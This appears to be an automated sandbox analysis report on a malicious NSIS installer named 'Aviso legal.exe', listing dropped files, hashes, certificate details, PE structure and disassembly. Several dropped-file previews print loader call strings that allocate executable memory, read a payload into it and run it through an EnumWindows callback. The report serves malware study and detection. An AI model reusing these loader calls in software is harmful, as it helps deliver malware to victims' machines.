                              Preview:......63............`VSw......P........g..B|......`...ddr......a.............................V...*....v..~v.......J............d....Z.A.........2..8.k........n....Q....6.8K.w.....|=.2..V........T......|.2%.............................e...G.............i....).............T...p..........t........8Z]...n...........f..P.J...X............\...[....PT.u...D.0..T.G................Pn...F.l.{.A.b..:.........>v.......L.......E..X.....T......x.......N........Lw...........%..6............?..........A..#...=....}.< ..}.......p........W{.AU......v>......;.'.@^....|...h......................N..A...#....,7..L.....O.....6.....R........<....kB.........|....Fs.........R&M.8..................U....+I...j...................0.......i......-......'.h...........J..v....w....O...F.o......^.9.......................T..........Z.....-......J.^!......R........d...........?.....O........g...e..............|..i*.....[I.bw.....................3.........7....~.......N.....-..1/...n..j?..<g......-....#..
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:ASCII text, with very long lines (331), with no line terminators
                              Category:dropped
                              Size (bytes):331
                              Entropy (8bit):4.2631934244817185
                              Encrypted:false
                              SSDEEP:6:uAIFWxlKGzpBfgJtDi+arecCh7L1mQqVMVeKAoF3+uhNMSqLIR8OFRLUAP+:uGaGLGBal7J4eKAoFJM7I2qJU9
                              MD5:F23E5726FF94C1301BD5E32F3A384C3E
                              SHA1:BE012A7A0E997F13FFA5AD5308EF79D1516457C3
                              SHA-256:F6F91C19DFFD7364E76C6CA987933CA9E376E3923455EA1CE5AD34BA23F38BE3
                              SHA-512:2E7F46E6483C7AD322EC25CB25FB43B11AB0B7251A4977D32BBE067E4238119CA2188F5E0546525F580906335AAA1F3F62E426332CE8DFA0B1CFC9E7F739862E
                              Malicious:false
                              Preview:autoerotic embolectomies stridendes instinctive olietankbekendtgrelses.skrubhvlede fonly torsoes brugergrnseflades kedlen slag.renpris spacecrafts cheerio plasmology tvangsruterne informalize,interprovincial briketteringerne heglingen boogies daabsattests archicytula.unpenned microcosmography teaterstykke.exploitage menace konks,
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4778
                              Entropy (8bit):4.9444746463548395
                              Encrypted:false
                              SSDEEP:96:QwmJdGj23rzlbBg4rB/sZGk1b6YiiBwsCTuP377ed8/C7G1:QwAUs5N/Tk1b6Iw43Wd8/C7G1
                              MD5:28034ACE2355FFFC34BC9E04BE013F82
                              SHA1:6F4DFAFAD03DB531FA1F1D2BB1E1DBAEB2DB834A
                              SHA-256:54D6568B778AD41428D64C10224FEF7D0E10E9933B9B7E37525291DE1A29D7D1
                              SHA-512:13829D45F74364752E207F44B8AD80037C0C247523DAEB6A29660F74B39692757064B8EDB353E2ABFC78F132401E4388E749F123FE40F1A27650501E84FC07D8
                              Malicious:false
                              Preview:..F....=........CH.V....S.........|...........q.....`. .........}..._.<.......h...yw......q.........\...Z......0..........n.}...h@)...............C.6.T.......g......1..L........Q....-+L....".a....^.......&..........................{.2.h.V........c........P........?p")......k....(...b....}.......#C.J.....J.^...........D5.....-.............jH.........Jf..Y...............n..!.@.w...........}...B.....".p.fK}.........=.k....3...!..........Cz.........{......{.........o.....m.....U.........W....8:..s.1.I.t........|..D..y.....A...%.......ln.....m....L....#.....W...KW.q.t...C....'...._.....'.-.......]..2..5c.A....P......l...~.W....v...........r!7.Y....54...<....^.B..gN..._....J...............B......B...........................T.I::...E.............7......6`................G...*...A.....8...Q.........Tc....S...-.e.....e....o.%.4.k...........o....|...O.P..z0......>......A.........[.4...H...4.....I.........P`.w...j......?W0=.f............6....!.7........2..m.......}.O@6...=W....
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3058
                              Entropy (8bit):4.867985240125452
                              Encrypted:false
                              SSDEEP:48:HBKUYIf22stTn+B4PWJRjnDj443qlGh1HnQmMP/RkjlyElrY7Ysc5v/sxSpzJoDQ:HoUXf2hn+BLb/j44+GrHojUYEsIvpVMQ
                              MD5:D90BE3D6F13E5C07EF0E73E87BE8C414
                              SHA1:A660A630B8786513BC8474C2FEEE0C5A8EAA5F36
                              SHA-256:F7167DE10D85A53381DD593BACA7763F8D5E354E36790D090183CAF76A69AF0A
                              SHA-512:3C957815684E6E39215E250AEA04637DD8CCDC0CBBC6962C83D717AC7F3CCAA61FA510EC2E9C95F106E4954CAF28936C20EB12C52AC986E0FDDBA8D05B88F661
                              Malicious:false
                              Preview:...........l..5.2.........\Q...O.....................y..U...........7...n.".......^...Y.........L..........k...........x.....:w.....*......@|.........\.......a.................f.........'\..X.D......E>.......'..`......\..............&..S....J........X.E..i............08...'..J.........O..........0.A.`3........+......r...8...,j0............F............w.g=.}..jn)V....Ab|.W......._.H...=~o..m.../.R...v..>T...........@v........k.d..............:............lc..<.....O....b........b........&t......q..7..K.+.p.........$..;.....)f...r..'.G'..........$.N........@...................^...d....2..]...k.r.c&....-............b.-.."W........g..>.V.F.....F.......i......#................................a.H.L........H......m..........4..O...~...Q..B...h......F..........l....}.....\_5........x......,...T...p.5.........T........................a+v.(...Rzw...,..oW.r....p......o....Q..........<1.....`.........h........I.....S.....Z..................... ..[.`w...u............1..........>.....
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4423
                              Entropy (8bit):4.949270542878988
                              Encrypted:false
                              SSDEEP:96:zL/Ix9oqXYZ74DMge7/pnsCj7LP1OBLde4kxd3BdeLQ:z0n3XYZ74wg+1U7sdwQ
                              MD5:B186E4CFD624F52C189CC24BDB396D8A
                              SHA1:45F714FFE18E6B5C8FFE9A89FC5AA79210CF8E6B
                              SHA-256:5E38990F303EFD9B1441FC30FAC0283DF4210F2DF44B6BFD035DC08A7C1714A4
                              SHA-512:7B3B68277F2C930B4E9E99233DB6C6B391972FF17007609F85B5F69564278B0CCCA5D4277D69BBA3953C2653133A61EE0FDF16F4C49B20EBA1FDF3359E04ADCA
                              Malicious:false
                              Preview:...y...M6....!4.w..8......*A..@........`.U..r.....0....l...`......n..k..A......".........E..X.$.k..................M..6.=......l.z..n.......:...n...........ra.Bj)...A.......&.......................I......9.......7..g......t.......W.Z.4).@9............q.n...&.M.............D....Z..?......p............ .....%.8.s...:.....|.............._..d.C../....M..?..............S.Q_...................w....`#......[.................@....9.f.x.....;..j.......................o..O...........Z.....F...1L%......y............u.Y.............'..[..W.................H.Y...+.1...........C...-...7..@...y..T.....................#.).......c.........,.Y.h......r....sK.....v.....J.3E....$..!.!.......;.c....~.....#0.........q..U.....>./0.......v...v...y.Z..P......2...f...A>....(..........3.A+......q.O...x..y......J..v..D........ {...kA...K.d.....^.......2q....B.m...?l.[.......E........b$....3..%B.....r............V..p....S......P.......o........k....J..D...O..T..2.......r.F...vg..S.Y...:.......\.....
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4892
                              Entropy (8bit):4.895010256290898
                              Encrypted:false
                              SSDEEP:96:VPthYc6b6NH3BEPHywchTFqK2GYdXR074ibaY5smmt735M0gR:HhKbQXKPH6Zq3dq74w1IpY
                              MD5:F6A285726B14A1ACE757153A1CF12B5B
                              SHA1:B8569BD93B142BC1A0F24BE9E7BB28434DB3873A
                              SHA-256:2B3A8EF4AEA23CCBF84F43C765EF57F2DCF22F2D1B74F1228BB50CA675392062
                              SHA-512:505D95401633E7CEFFC208F588219BF10812861871EDFA4F53562E3058B82D11AA07E9A64EB88F1D148BCAF8E5A8A109A320CA80323516D0F6F0E3D19CAEAA07
                              Malicious:false
                              Preview:....._1.......n.>........v........F^...............e..{.............%........&...-..............g...cd..z.............?.............6..T....d..F....r....$9.........r................G..A......4.....}.............|......".0$......)Qo..t.......q.......~.................2...............J.g.........[......et....c............IC.......4Nk....?.........f.../.....aB..L..0.....b.O...Y.......E....z%f......p.........../..........s>.F......W......._.9......L....a.{...Kk..n..;..Y...A........e........s..............]8../7........X................h.@.........4........'b>...G../..2....6........d....F..P.W...........].J.._.........5z....V...............%=h,..u......z.............oqT............:.....v...#...X.J)Eb............j."..............L..G.........\m....l..-.......G...)e.....'a..A...].....2....2.O...8...\.....Z.................f...x.$...........N....h..........p..x...............S..........%..o...... .........T.....Z..k....Q.......(6...]^.........L........4.............#....{D.W........b
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3615
                              Entropy (8bit):4.781717113533645
                              Encrypted:false
                              SSDEEP:48:fY3eTl0lNjDAiMeKMRyDQyJDxlm2fUFNJLQYyEA1KVMAd7EDlLLTj3mVXotkgv7:w3eyt7cDlFlf2JQcRxdYBbttPv7
                              MD5:451F7B3BC2501AFDFDD0B5AF1E3706F9
                              SHA1:7CBAFB7CEBCBD0A10D3B32A8A01D68390E5E24B9
                              SHA-256:165FD704517A414C5579286871CE6717BEE64908B3DAD07802AFD2EE81371BB8
                              SHA-512:E051168098EDA4D96188B34E82060AC195C03D061DEC2A798EBC0C78D783564FB49CCF7E154235EC9D24664CBFC120594B515D50E738808328ADCA984A33DB6B
                              Malicious:false
                              Preview:..P.2..........................;.........................s.........w..|........i.1.......UZ(_..G.......pQ.........RQ.................f......}.....%....N.....:.........R....*3......J.......%........z..X...(..........t...,...\..Oh08..+..!..5.........V....!.....<.K.B/........3......_........7.....s.S.../......5..A.f....m..........e.9s..>.{....u...;vb...)D.........p........u.....+.d........7.$!.A......f............o..~...x....q.[.M...u....W...W..P..p............[.......................<....a.........../...........................d....H...|.....>.......'..S._.g.*.U.....!....z..............h......*.JV...........L....4....#....hV......1..../..2........[....#.....o...v.A....F....n..........g...s.............-.Q....................:._...=......'4......_.....r.$.W*...-.......U!...\.........@......i..[....M.'.Z.X.....k..................^............Yg...j.....".\....BK......."5}......l".....................b...q..GG.............5....E.......F..u....i......T....}..........d&.........x
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3672
                              Entropy (8bit):4.97616940802998
                              Encrypted:false
                              SSDEEP:48:xFS79alozLFOVJpXsZHdigJOuiNA4G+stAqo3/neCXLsiEzvwY7Fw5fiTjjpPQD:xY79GVaHdjEA4GJ89XQS8Xp+
                              MD5:EEDA9DA1B55D1D2B24EADF3AAB92C34C
                              SHA1:855DD4C049A987BB5801F201953F777067DCDEDB
                              SHA-256:2F90A5F2F6BF58DC153B44DC2879CBEF1C78DE3891D9B3E6EEA9BF2A6B588376
                              SHA-512:2ABA51EF997943679FC2E48DF582F04BDDCB91AF48E9C83100D194B0B367D03440FE7A9E822DB8A55FC8897E5F3B0BEE151E60261D33D88B77140AF2551BA282
                              Malicious:false
                              Preview:....Y.........................|...b..............._.V..z..6..........F........6....c........o..J...e..y/...5..w.+.&.....4.........\C.o.......J.c.....n.p...f....p...L..........((.............@......p..h.(...1...H.?...........................qZ......q.%..s....K.p....}.......c........a..0...0.........m..B(a.........~...:...~.A....H;....!@.....k..]...........*~............I......*.....................s......C.......t..+..A@K.}...\.......l..9....h............ S.=...e...0......ye...........k.....]...........}.f...f....................+.......Z....k.....3..~................x........)....8................|.......d....S.L..J...+.4x...F...A..............^..@.......}G...[.:....K....]....../.C.....<.....l..A..5..W.k%X..2..............D...7.....^...'............f............9.sH......>.m....v.........Y....d.Nm..k.............."....0..........+-....l.............0......0....{..t...b.......SZ..i......3.......y......c[&[....NG.8m...'.........W.....#.......q..7J!.w}...f...........*;..........
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2641
                              Entropy (8bit):4.912370258732604
                              Encrypted:false
                              SSDEEP:48:+M4x/IiuH84UKlQlzNROyeCFA6t5CXPTfLXKK+BHGUD5c:+M4x/IiiUJlzleCC6bqPuHGUD5c
                              MD5:CF17370F08735B5C4A7ED26B0563463F
                              SHA1:D7EDF15F524BC780F626A84A43CF352BD7216AEF
                              SHA-256:15759A8E0FC11F64C4B2F23602B8748664313F421B8D766D3CB9AEFFB74DD7B9
                              SHA-512:0C63D7695F04E7AED64EF2346C2CDC8E49BD9BFE52875DE27F35B677A7FD63C555E935EE09128AE9EBF2152F253ADEC72848AE7F8C17B67E8C14B3B36D6CC816
                              Malicious:false
                              Preview:,........n...SX..............k.......)......@...c..n..Q........J.r.........$*....`...u.O....w................A................).....$.............V.......k.......2.......+..4..........E..E.........................&.....0...l.....g.;..l....>.t.1................C...*......d.....s..x..q......6.....6..2.......G...i."......(.....%.....V..q....Z..".......... %..m..K=..4.w...........J...N.....................f..o...........5.V.............Z........\..............1aT....#.p.....c...r..............*<.Bv....E............e.l.........S.7......KiW..... ...........'...-...^....\........."......%...v..OoJ.............:................o#"..+.t............4....1.........5.p.............A...`.....F...%....r.#..._j.......O..... ............L..l.....H.-.%.U_.B......y....}.....<......(....@........U.........................!....*....Z.z....to....q...8.................E...........r..,.h...........m.P.`.-..PU{...~.8.........X.'..........S.b...@..|...........o.......D.....K.....^^..b............
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2067
                              Entropy (8bit):4.965244696425312
                              Encrypted:false
                              SSDEEP:24:HnfGRZfBdLl/b/CmvGHbgs/k7Lqc/IsiYuGghgfaZTMvj61a6SJks+2bU207PNWu:/GRZfDRDTr6NIkfdGj6tdeTyWhYWXn4B
                              MD5:DF7943BFD11E14F049F4BD3D91DECD2B
                              SHA1:13DBFC7E14CB175310AA3F4840A7D6D3B3C8CE14
                              SHA-256:97EC7C704B6F51EA3BAFB10FDB0EA5E75C1A2C32939434956DEC192AB23EEC03
                              SHA-512:07A13D183798AF38D683F1B2C465B0AE98A530713EE05328194ACDC408A9643A889F009A9CF840C658F5B06D57EAF91C40B490CFF0B49CA5707F592E315C3C86
                              Malicious:false
                              Preview:.........^.}P..O........O.n. ...W_............."g".....I..}.....a.Z*.=... ....{..B.....gG...o.........{.......5............{......~..@..........{...([RL....m.............{m......1.....,..........2N-..\......................6.......1.........T....4....y.A.......}............o..B..*........_.....R.Dp.N*....^.....xQ...........3....<...q.....V.....&.`.I........... 4&\...Qc......~.......9....s2......N.....[..........y............G....................}.h....q..K.........B8.F.........t....kv..fF..b........S...D...... %2...K<....W....>5.........8...........r.....X..v.Z..................#.....T.M....d..................8...C.]................t...J....5"...5.[.'...-......w..]......#.........._....z9.L.^...5....................]Y.....!......:........95..Bi6...._.].8.............................4M...&......h.'/0...e...;.....C...#yx.N.....L/..}..\.......FuF?......<....X....n....#$.......T.o....J.....{#...)...<3..........KB..................H.....v....R.....q.......q..._.......{....]z..7........
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):92253
                              Entropy (8bit):4.596041951543385
                              Encrypted:false
                              SSDEEP:1536:DVE3+5YGgIGS185zYsJhwGIrJrxUn9Pb9a1vzEpxDP8a7af:C3+5ZgzYsU7bUn9D0cJEa7af
                              MD5:DF166856C7BBD30800ED9DB7A4A9EC6D
                              SHA1:C5ECB8B843D5C0B4BB245B940358A299C50A2D13
                              SHA-256:A38112A083EE7B2AE0B7DD3C3FEA1F5AF44D9C93708E0C19F88DFC708898E560
                              SHA-512:78629B41D26EA80E91C042E27C63489DCB6D2A7253F01A9AB69742E58829ECFBC08A7DF9AE396DC50D4240FF98D79F1FC94DE5F971BCAC3194A40FEA4327525D
                              Malicious:false
                              Preview:..qqq.P.i.V................R...........................dd._..............P.........~~~.'...........'.........i........zz............''..............PP...q..............c........h..hh.......f..D..........;........J.>>.CC.......................ZZZZ.@@@.........#......nn...........WW......................QQQ................B..8................#......I........................(....x....<<<<<.....................................k..o.....l....................H....++.Q..K..........===.......................JJ.....................B.....P.........{{{{..AAA.......''...............F....[............$....|.RRRR.....55........................g...+.......I......v..NNN...................((((..........hh....u.N.............O...............................uu............/.1...rr.......ll.................f.........]......p..........=..ll...!!..D........K...........n.....88888.(((....................L.......1.J........ww.........................................7...KK.HH..........j........................t.
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):74
                              Entropy (8bit):3.9637832956585757
                              Encrypted:false
                              SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                              MD5:16D513397F3C1F8334E8F3E4FC49828F
                              SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                              SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                              SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                              Malicious:false
                              Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: MSK203.exe, Detection: malicious, Browse
                              • Filename: MSK203.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Trojan.InstallCore.4086.7598.27088.exe, Detection: malicious, Browse
                              • Filename: 61pzTJKVJX.exe, Detection: malicious, Browse
                              • Filename: 990009371653-Q095605-0-TB727985.exe, Detection: malicious, Browse
                              • Filename: Structure description-Rev.00.exe, Detection: malicious, Browse
                              • Filename: #Ubcf5#Uc0ac#Ubcf8 NDS24000012-2-Rev.0.exe, Detection: malicious, Browse
                              • Filename: RFQ-NVW-Norsok-EQPT REQS-Rev.00.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):52
                              Entropy (8bit):4.0914493934217315
                              Encrypted:false
                              SSDEEP:3:sBa99k1NoCFOn:KankVg
                              MD5:5D04A35D3950677049C7A0CF17E37125
                              SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                              SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                              SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                              Malicious:false
                              Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):4.256564762130954
                              Encrypted:false
                              SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                              MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                              SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                              SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                              SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                              Malicious:false
                              Preview:user32::EnumWindows(i r1 ,i 0)
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.543716429911504
                              Encrypted:false
                              SSDEEP:3:sEMBQEJkJVEji6J2vdWxQoXUn:/6AWxvUn
                              MD5:2D45B071BCE5847E12B6308C981E1AB7
                              SHA1:5BC8E983895ACD8ED0D5BB4FC48355CF5871ED2C
                              SHA-256:3E9039677F7626A652276F60ECB67B20CD004050AF6D7CEC32D237591254CB81
                              SHA-512:E838C8C079A8CA453EAA5509DF7FE8340329AFBF6E6205938EBCAC23A98514B7465E8AB7CC9E1BE1AF10423AB87C8F1797013B58DFFCC3D29A35A792D8F05EBC
                              Malicious:false
                              Preview:kernel32::VirtualAlloc(i 0,i 68571136, i 0x3000, i 0x40)p.r1
                              Process:C:\Users\user\Desktop\Aviso legal.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):56
                              Entropy (8bit):4.250903860294566
                              Encrypted:false
                              SSDEEP:3:sAAEVvjs8S6JA84n:fLXS6U
                              MD5:C599D20101D8532A39FEFBEC3A4162A9
                              SHA1:6215D1ABF9002230448221E1EBDCB2916DF29CB3
                              SHA-256:DB2D57C0D52D8989DE271B0B5440E043C7C93B4F58092DE80A1C1E569F5327B2
                              SHA-512:DF32094A64597C11D96B2844EA097C960CF39901508DCDF9D0892E2879706D2B6A178D1F798A1BA22613091C79B11BA468B21AD04F7856C8BE3CFD517330DF93
                              Malicious:false
                              Preview:kernel32::ReadFile(i r5, i r1, i 68571136,*i 0, i 0)i.r3
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):5.653105824231968
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:Aviso legal.exe
                              File size:841'240 bytes
                              MD5:c7ae7bfda7f71b76c6f3213cfe94529e
                              SHA1:eebcb778056a8fa9a33255141d70ffac41523caf
                              SHA256:93b75e7f99768d86cb26282a3164d806d36a2c890fb7d367f0cf389a75d304d4
                              SHA512:70326a8b9f6c7d99f82e32f0116b23e2b879bbea3235b03e7510a080ffbbeabc2620b09be4406a2a2b28b62c0679a3ee56e39b7398991693c80da0d84fe43fd2
                              SSDEEP:12288:8bBFvUojlMVWIhWL7Uc8Eh8xn8mWpXS0iNrmY:8bPvUohIWIhko9xnVWpCH
                              TLSH:4F05E1C2B18014A6E9744F3958365C8726B77D7DFCB0B81E6996F0A65B7B2E3102BC07
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                              Icon Hash:0401250109010d0c
                              Entrypoint:0x40352d
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                              Signature Valid:false
                              Signature Issuer:E=Dictating@Neals.Tel, O=Trapper, OU="Upaataltes Proterothesis Toothcup ", CN=Trapper, L=Bevington, S=Iowa, C=US
                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                              Error Number:-2146762487
                              Not Before, Not After
                              • 14/08/2023 11:41:16 13/08/2026 11:41:16
                              Subject Chain
                              • E=Dictating@Neals.Tel, O=Trapper, OU="Upaataltes Proterothesis Toothcup ", CN=Trapper, L=Bevington, S=Iowa, C=US
                              Version:3
                              Thumbprint MD5:11BC420115D8ACEACC5D6244ABF4373D
                              Thumbprint SHA-1:8AB6E862ACF364220D20DC9B3B751F722332D317
                              Thumbprint SHA-256:7324B8CF0875F2DD6EA0F7AEBB1948BFF8D6582FCFD80B28C72C7C5B76198877
                              Serial:06CB303D2313543B083B326C3429254DD90C4ADA
                              Instruction
                              push ebp
                              mov ebp, esp
                              sub esp, 000003F4h
                              push ebx
                              push esi
                              push edi
                              push 00000020h
                              pop edi
                              xor ebx, ebx
                              push 00008001h
                              mov dword ptr [ebp-14h], ebx
                              mov dword ptr [ebp-04h], 0040A2E0h
                              mov dword ptr [ebp-10h], ebx
                              call dword ptr [004080CCh]
                              mov esi, dword ptr [004080D0h]
                              lea eax, dword ptr [ebp-00000140h]
                              push eax
                              mov dword ptr [ebp-0000012Ch], ebx
                              mov dword ptr [ebp-2Ch], ebx
                              mov dword ptr [ebp-28h], ebx
                              mov dword ptr [ebp-00000140h], 0000011Ch
                              call esi
                              test eax, eax
                              jne 00007F3C34B16D6Ah
                              lea eax, dword ptr [ebp-00000140h]
                              mov dword ptr [ebp-00000140h], 00000114h
                              push eax
                              call esi
                              mov ax, word ptr [ebp-0000012Ch]
                              mov ecx, dword ptr [ebp-00000112h]
                              sub ax, 00000053h
                              add ecx, FFFFFFD0h
                              neg ax
                              sbb eax, eax
                              mov byte ptr [ebp-26h], 00000004h
                              not eax
                              and eax, ecx
                              mov word ptr [ebp-2Ch], ax
                              cmp dword ptr [ebp-0000013Ch], 0Ah
                              jnc 00007F3C34B16D3Ah
                              and word ptr [ebp-00000132h], 0000h
                              mov eax, dword ptr [ebp-00000134h]
                              movzx ecx, byte ptr [ebp-00000138h]
                              mov dword ptr [00434FB8h], eax
                              xor eax, eax
                              mov ah, byte ptr [ebp-0000013Ch]
                              movzx eax, ax
                              or eax, ecx
                              xor ecx, ecx
                              mov ch, byte ptr [ebp-2Ch]
                              movzx ecx, cx
                              shl eax, 10h
                              or eax, ecx
                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x64ea8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0xcc1f00x1428
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x68970x6a00ce9df19df15aa7bfbc0a8d0af0b841d0False0.6661261792452831data6.458398214928006IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x80000x14a60x1600a118375c929d970903c1204233b7583dFalse0.4392755681818182data5.024109281264143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xa0000x2b0180x60082a10c59a8679bb952fc8316070b8a6cFalse0.521484375data4.15458210408643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata0x360000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x590000x64ea80x650005294253f9c9db21a50d62c4c6bdf0863False0.13441029161509901data1.8715837561545812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x593280x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.1180356244637098
                              RT_ICON0x9b3500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.14203537205725777
                              RT_ICON0xabb780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.1536157241959218
                              RT_ICON0xb50200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1853448275862069
                              RT_ICON0xb92480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.20881742738589212
